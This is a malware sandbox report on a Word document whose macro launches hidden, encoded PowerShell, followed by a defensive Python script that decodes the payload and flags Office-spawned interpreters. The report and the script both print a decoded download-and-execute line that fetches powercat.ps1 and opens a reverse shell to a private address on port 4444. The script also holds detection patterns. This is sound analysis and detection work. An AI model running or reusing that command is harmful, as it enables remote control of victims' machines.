Analysis
  max time kernel: 54s
  max time network: 17s
  platform: windows7_x64
  resource: win7-20240708-en
  resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  submitted: 22-07-2024 21:58
Behavioral task behavioral1
  Sample: a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513.doc
  Resource: win7-20240708-en
Behavioral task behavioral2
  Sample: a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513.doc
  Resource: win10v2004-20240709-en
General
  Target: a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513.doc
  Size: 30KB
  MD5: 68bc25652d7c957bb2e38bf08cbc29b6
  SHA1: 8aa49fd09dcad64e112ebcf9736d6922b60175c9
  SHA256: a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513
  SHA512: d9e87f1d2aea6ee8c2100da6c40a8f2f38075d8dedabf1e408f06ad7813686f6e624d60f71f710e330a1bf779c575b48b8d033c740bbee0db1c28af7f52dd3fd
  SSDEEP: 192:OaIlLZEvA+6/6rNavrgYjk+4bWlMYTxsud3cvP+rDBLg0jw2tqflTXPa:TE8iSwvxjk+tMYN30P+rDZg0j/tq9
Malware Config
Extracted
  URL: http://192.168.45.218/powercat.ps1
  Note: 192.168.45.218 is an RFC 1918 private address, so the second stage is fetched from a host on the submitter's own network rather than from a public server; outside that network the download (and the callback to the same address) would fail.
Signatures
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process
  pid: 2848  pid_target: 1984  Process: powershell.exe  procid_target: 30
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell with its display window hidden (-w hidden).
  pid: 2848  Process: powershell.exe
Drops file in Windows directory 1 IoCs
  description: File opened for modification  ioc: C:\Windows\Debug\WIA\wiatrace.log  Process: WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener 1 IoCs
  pid: 1984  Process: WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs
  pid: 2848  Process: powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs
  description: Token: SeDebugPrivilege  pid: 2848  Process: powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs
  pid: 1984  Process: WINWORD.EXE
  pid: 1984  Process: WINWORD.EXE
Suspicious use of WriteProcessMemory 8 IoCs
  description: PID 1984 wrote to memory of 2464  pid: 1984  Process: WINWORD.EXE  procid_target: 31  (logged 4 times)
  description: PID 1984 wrote to memory of 2848  pid: 1984  Process: WINWORD.EXE  procid_target: 32  (logged 4 times)
Processes
1. C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE  (PID 1984)
   Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513.doc"
   - Drops file in Windows directory
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\splwow64.exe  (PID 2464)
      Command line: C:\Windows\splwow64.exe 12288
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2848)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMQA4AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMQA4ACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA
      The -enc argument is base64 of UTF-16LE text and decodes to:
        IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.218/powercat.ps1');powercat -c 192.168.45.218 -p 4444 -e powershell
      (i.e. fetch powercat.ps1 from 192.168.45.218, then open a reverse shell to 192.168.45.218:4444 with powershell as the bound process.)
      The command line names System32\...\powershell.exe but the image that ran is under SysWOW64: the 32-bit Office14 WINWORD.EXE launched it, and WOW64 file-system redirection maps System32 to SysWOW64 for 32-bit callers.
      - Process spawned unexpected child process
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
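The process tree above (WINWORD.EXE launching powershell.exe with -nop -w hidden -enc) is exactly what an analyst wants to decode and what a detection wants to match. The Python below is an added example, not code from the sandbox report or from any tool it names: it decodes a powershell -EncodedCommand argument (base64 of UTF-16LE text), pulls URLs, IPv4 addresses and nc/powercat-style -p ports out of the result, and evaluates process-creation records against an Office-parent/script-interpreter rule. The three records are constructed in the field layout of a Sysmon Event ID 1 event; their image paths, PIDs and command lines are copied from the tree, while the explorer.exe parent of WINWORD.EXE is an assumption. The OFFICE_APPS and INTERPRETERS sets deliberately go beyond the single WINWORD.EXE/powershell.exe pair this report shows.

```python
"""Decode a powershell -EncodedCommand payload and flag Office-spawned interpreters.

Added example, not code from the sandbox report.  EVENTS is constructed in the
field layout of a Sysmon Event ID 1 (process creation) record: image paths, PIDs
and command lines are copied from the report's process tree; the explorer.exe
parent of WINWORD.EXE is an assumption.
"""
import base64
import ipaddress
import re
from pathlib import PureWindowsPath
from typing import Optional

# Every unambiguous abbreviation of -EncodedCommand that powershell.exe accepts.
ENC_FLAGS = {"-e", "-ec"} | {"-" + "encodedcommand"[:i] for i in range(2, 15)}
HIDDEN_FLAGS = {"-w", "-win", "-window", "-windowstyle"}
# Generalised beyond the report, which only shows WINWORD.EXE -> powershell.exe.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_EXEC = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of the -EncodedCommand argument (base64 of UTF-16LE), or None."""
    tokens = cmdline.split()
    for flag, payload in zip(tokens, tokens[1:]):
        if flag.lower() not in ENC_FLAGS:
            continue
        payload = payload.strip("'\"")
        payload += "=" * (-len(payload) % 4)          # tolerate stripped padding
        try:
            return base64.b64decode(payload, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def _is_private(ip: str) -> bool:
    try:
        return ipaddress.ip_address(ip).is_private
    except ValueError:                                 # the regex also admits e.g. 999.1.1.1
        return False


def extract_indicators(script: str) -> dict:
    """Pull URLs, IPv4 addresses and nc/powercat-style '-p <port>' values from a script."""
    urls = re.findall(r"https?://[^\s'\"()<>;]+", script)
    ips = sorted(set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", script)))
    ports = re.findall(r"(?i)(?:^|\s)-p(?:ort)?\s+(\d{1,5})", script)
    return {"urls": urls, "ips": ips, "ports": ports,
            # All infrastructure RFC 1918 => lab/pentest build, not live internet C2.
            "private_only": bool(ips) and all(_is_private(ip) for ip in ips)}


def assess(event: dict) -> dict:
    """Score one process-creation record; returns reasons, decoded script and indicators."""
    image = PureWindowsPath(event["Image"]).name.lower()
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent in OFFICE_APPS and image in INTERPRETERS:
        reasons.append(f"{parent} spawned {image}")
    lowered = cmd.lower().split()
    for flag, value in zip(lowered, lowered[1:]):
        if flag in HIDDEN_FLAGS and value.strip("'\"") in {"hidden", "1"}:
            reasons.append("hidden window requested")
        elif flag in ENC_FLAGS:
            reasons.append("encoded command line")
    decoded = decode_encoded_command(cmd) if image in {"powershell.exe", "pwsh.exe"} else None
    indicators = extract_indicators(decoded) if decoded else {}
    if decoded and DOWNLOAD_EXEC.search(decoded):
        reasons.append("download-and-execute in decoded script")
    return {"pid": event["ProcessId"], "image": image, "parent": parent,
            "suspicious": bool(reasons), "reasons": reasons,
            "decoded": decoded, "indicators": indicators}


WINWORD = r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"
DOC = r"C:\Users\Admin\AppData\Local\Temp\a474f85bae9fe1f702af66093264cac9be9f8eb9de88e6478ed81d4512dd2513.doc"
ENC_PAYLOAD = (  # the -enc argument exactly as recorded for PID 2848
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"
    "LgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMQA4AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsA"
    "cABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMQA4ACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA"
)
EVENTS = [  # constructed records; explorer.exe as WINWORD's parent is assumed
    {"ProcessId": 1984, "Image": WINWORD, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{WINWORD}" /n "{DOC}"'},
    {"ProcessId": 2464, "Image": r"C:\Windows\splwow64.exe", "ParentImage": WINWORD,
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"ProcessId": 2848, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": WINWORD,
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -enc '
                    + ENC_PAYLOAD},
]


def triage(events=EVENTS) -> list:
    """Return the findings for every record that tripped at least one rule."""
    return [f for f in map(assess, events) if f["suspicious"]]


if __name__ == "__main__":
    for finding in triage():
        print(finding["pid"], finding["parent"], "->", finding["image"], finding["reasons"])
        if finding["decoded"]:
            print("  decoded   :", finding["decoded"])
            print("  indicators:", finding["indicators"])
```

Only the powershell.exe record is reported; WINWORD.EXE itself and the splwow64.exe print-spooler helper pass. Matching on the flag set alone (-w hidden, -enc) would already fire, but decoding the payload is what turns the alert into actionable indicators: the download URL, the callback address and port, and the observation that every address is private, which marks this submission as a lab build of a powercat reverse shell rather than a sample with live internet C2.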